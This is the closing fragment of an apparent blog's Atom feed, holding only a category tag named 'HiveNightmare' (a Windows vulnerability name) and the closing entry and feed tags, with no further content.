<category term="HiveNightmare" scheme="https://f23y.github.io/tags/HiveNightmare/"/>
</entry>
</feed>